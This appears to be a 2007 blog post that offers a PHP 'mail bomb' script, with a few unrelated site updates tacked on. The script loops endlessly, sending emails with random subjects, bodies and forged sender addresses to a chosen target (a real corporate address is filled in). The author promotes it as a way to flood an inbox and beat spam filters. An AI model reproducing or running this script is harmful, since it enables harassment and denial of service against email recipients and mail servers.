Currently in development!
phpBB.nl Topic // phpBBModders.net Topic
Hi all,
below, a file that can be used to send a mail bomb ![]()
You only need to change target@target.com, for the target.
He will get hundreds/thousends of email with random title/sender/content ![]()
Result => no spam filter can resist ![]()
<?php
# [BOM.PHP]
# © Jan Marques, 2007
#
/* Edit reciepent */
$target = “bill@microsoft.com”;
/* The script */
set_time_limit(1);
while(true)
{
mail($target, md5(rand()), md5(rand()), “From: ” . md5(rand()) . “@” . md5(rand()) . “.” . md5(rand()));
}
?>
Thanks to Evil>3 and John Hjorth, now also Danish and German are available ![]()
From today on, Janmarques.net is also available in Dutch
As you can see, I’ve did some changes to the header and blog too…
Recent Comments